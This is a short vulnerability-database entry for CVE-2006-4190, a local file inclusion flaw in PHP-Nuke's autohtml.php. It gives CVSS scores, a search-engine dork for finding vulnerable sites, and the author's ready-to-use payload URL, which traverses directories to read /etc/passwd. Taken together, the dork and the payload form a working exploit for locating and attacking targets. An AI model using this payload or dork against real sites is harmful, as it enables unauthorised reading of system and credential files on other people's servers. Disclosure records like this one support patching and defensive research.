PHP-Nuke (autohtml.php) local file include

2006-08-18 / 2012-03-12
Credit: MosT3mR
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-4190
CWE: CWE-98
Dork: allinurl:\"autohtml.php\"


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

################################################################### # local file include in PHP-Nuke (autohtml.php) # # Rish : High # # Class : Local # # Script : autohtml.php # # Thanks : www.lezr.com/vb & All kuwait hackers # # Link : http://www.lezr.com/vb/showthread.php?p=104324 # # D()rkiz : allinurl:"autohtml.php" # # autohtml.php?op=modload&name=[The-file-you-want-to-include] # # Exampel : http://www.site.com/autohtml.php?op=modload&name=../../../../etc/passwd # # By : MosT3mR # ###################################################################

References:

http://www.securityfocus.com/archive/1/archive/1/443289/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top